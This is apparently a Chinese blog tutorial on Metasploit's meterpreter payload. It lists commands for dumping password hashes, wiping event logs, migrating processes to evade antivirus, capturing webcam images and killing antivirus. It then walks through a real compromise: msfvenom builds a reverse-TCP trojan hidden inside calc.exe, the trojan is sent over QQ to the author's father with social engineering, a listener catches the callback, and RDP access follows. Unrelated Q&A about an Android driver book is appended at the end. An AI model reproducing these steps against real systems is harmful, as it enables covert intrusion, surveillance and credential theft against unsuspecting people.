meterpreter详解与渗透实战

payload

payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。
payload有几种类型:
singles:独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp这个payload。
stagers:传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与传输体载荷配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后方便注入,这类载荷功能都非常相似,大致分为bind型和reverse型,bind型是需要攻击机主动连接目标端口的;而reverse型是目标机会反连接攻击机,需要提前设定好连接攻击机的ip地址和端口号。
stages:传输体载荷,如shell,meterpreter等。在stagers建立好稳定的连接后,攻击机将stages传输给目标机,由stagers进行相应处理,将控制权转交给stages。比如得到目标机的shell,或者meterpreter控制程序运行。这样攻击机可以在本端输入相应命令控制目标机。
由此可见,meterpreter其实就是一个payload,它需要stagers和相应的stages配合运行,meterpreter是运行在内存中的,通过注入dll文件实现,在目标机硬盘上不会留下文件痕迹,所以在被入侵时很难找到。真因为这点,所以meterpreter非常可靠稳定优秀。

meterpreter

payload能使用meterpreter尽量用meterpreter。因为它真的很强大,小小的程序可以实现太多太多的功能了。
在meterpreter下面进行help:
meterpreter help
可以看到有很多命令工具可以使用,非常方便!
下面调一些重要的功能介绍一下:
1. background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
2. sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
3. clearev:该命令是用来清除渗透的登录信息的,这个很有用。
4. hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的,输入”run post/windows/gather/hashdump”

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 1c4d83525a46e3e4670caa28fbf1a7fd...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter > 

migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。

meterpreter > run post/windows/manage/migrate

[*] Running module against DX1XMSTMBBJR3FZ
[*] Current server process: notepad.exe (3292)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 6020
[+] Successfully migrated to process 6020

search:这个命令是用来搜索系统中的文件的。
shell:这个命令是返回目标系统的shell命令行,在windows下返回cmd命令行,在unix下返回sh命令行。这个命令非常实用
webcam_list:列举摄像头。
webcam_snap:通过远程连接目标系统的摄像头。
run killav:关闭对方的杀软,其实关闭杀软也可以进入cmd中手动关闭。
当然meterpreter还有很多很多使用的命令,百度谷歌一大把,不过每一个meterpreter是不一样的,在windows下和linux下功能有差异。在运用中需要help具体查看。

渗透家中xp系统实战

  1. 生成xp系统可用的payload:
freestyle4568@freestyle4568 ~ $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 -f exe -x calc.exe -k -o hack.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 152576 bytes
Saved as: hack.exe

这里没有进行免杀处理,如果有360的话,免杀也是一个重点,可以借助veil framework和shellter等免杀工具加壳或者编码。这里我只是简单的将payload放入计算器calc.exe中,因为家中老爸电脑没有安装360。
2. 用qq发给老爸,通过社工让他点击hack.exe,然后在本机进行监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
run

在hack.exe运行的时候会反连本机。当然要在hack.exe运行之前监听本机端口。
下面得到了meterpreter。
这里写图片描述
3. migrate将hack.exe进程转移至其他稳定进程中,实战用需要。
4. 利用meterpreter收集目标机信息,这里写一个txt文件在桌面,意思一下嘛。
edit Yhack.txt
ls
这里写图片描述
5. 打开cmd命令行,看看已打开的端口。
这里写图片描述
可以看到3389端口打开着。。。吐槽一下,我家电脑为啥3389端口开着,难得被黑过了吗。。。
6. 用远程桌面连接一下,这里注意其实有了cmd命令行,又有了管理员权限,其实我们可以打开任意的端口,进行任意的操作。

freestyle4568@freestyle4568 ~ $ rdesktop -u administrator -p ""  192.168.1.106:3389

remote desktop
ok啦!
上面的渗透过程很基础,其实最重要的是如何将payload放入目标机中,以及如何在目标机中运行payload,提权也是需要考虑的问题,最后感叹一句“还是需要学习啊”

  • 12
    点赞
  • 56
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
### 回答1: 《Android驱动开发与移植实战详解》是一本系统讲解在Android平台上驱动开发与移植的书籍。本书主要内容包括Android系统架构、驱动框架、Linux驱动开发方法、Android下驱动开发与移植等方面。本书由易到难、由浅入深,从讲解Android系统架构和驱动框架开始,通过对Linux内核驱动开发方法的讲解来引入读者进入Android下驱动开发与移植的实践。 本书从Android平台的体系结构开始,系统介绍了Android平台的各个组成部分,包括Java层、Native层和Linux内核层。在介绍完整个Android系统架构的同时,本书也详细讲解了Android内核的驱动框架,包括Linux内核驱动框架和Android内核驱动框架,并详细介绍了驱动的编写方法、调试方法和性能优化技巧。 本书还介绍了Android系统下常用硬件的驱动开发方法,包括USB驱动、SPI驱动、I2C驱动、MMC/SD卡驱动、LCD驱动、触摸屏驱动、按键驱动等。而且本书还详细介绍了Android系统的设备树,以及如何进行驱动的移植和调试。 总体来说,本书内容丰富,对Android驱动开发及移植有一定的基础和经验的读者可以通过本书进一步提高自己的技术水平。该书能帮助读者深入理解Android系统的内在机制,掌握Android驱动开发与移植的实际应用技能,是一本实用性强的专业书籍。 ### 回答2: 《Android驱动开发与移植实战详解pdf》是一本关于Android系统驱动开发与移植的专业性教材,主要介绍了如何进行Android系统驱动的开发、调试和移植,帮助读者掌握Android系统底层驱动的知识和技术。 本书首先介绍了Android系统的架构和驱动模型,深入分析了Android设备驱动的实现方式和工作流程。然后详细讲解了如何编写和调试Android驱动程序,包括内核模块、字符设备驱动、块设备驱动等多种类型的驱动开发。 此外,本书还解释了Android驱动程序的移植方法和技巧,包括从其他Linux系统移植Android驱动程序、自定义Android驱动程序以及如何把一个驱动程序移植到不同的设备上等重要内容。这样的话,读者可以在实际项目开发中更加容易地完成Android驱动程序的实现和移植。 总之,《Android驱动开发与移植实战详解pdf》是一本涵盖了Android系统驱动开发和移植等方面内容,对于想进一步了解Android系统底层工作原理的读者有着重要的指导意义。无论是初学者还是有经验的开发人员,在阅读本书后都可以获得很多关于Android驱动开发和移植的实用技巧和工具。 ### 回答3: 《android驱动开发与移植实战详解》是一本介绍Android驱动程序开发和移植的实用指南。本书包含了许多基础概念、应用场景和实例,可以帮助读者快速学习Android驱动程序开发和移植的实际应用。 本书的内容涉及很多主题,例如Android系统的架构和驱动模型、设备驱动程序的编写、驱动程序的调试和测试、不同类型设备的驱动程序移植等。其中,编写设备驱动程序需要掌握C语言的基础知识,而调试和测试则需要熟悉一些工具和技术。 本书的每一章节都配有大量的实例代码和案例分析,可以帮助读者深入理解Android驱动程序的开发和移植流程。同时,作者也提供了一些实用的技巧和建议,例如如何选择最合适的驱动程序类型、如何调试设备驱动程序、如何在移植设备驱动程序时避免常见问题等。 总之,《android驱动开发与移植实战详解》是一本非常实用的书籍,可以帮助Android开发者更加深入地了解驱动程序开发和移植的实际应用。对于那些刚开始从事Android开发的读者来说,这本书也是一个非常不错的入门指南。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值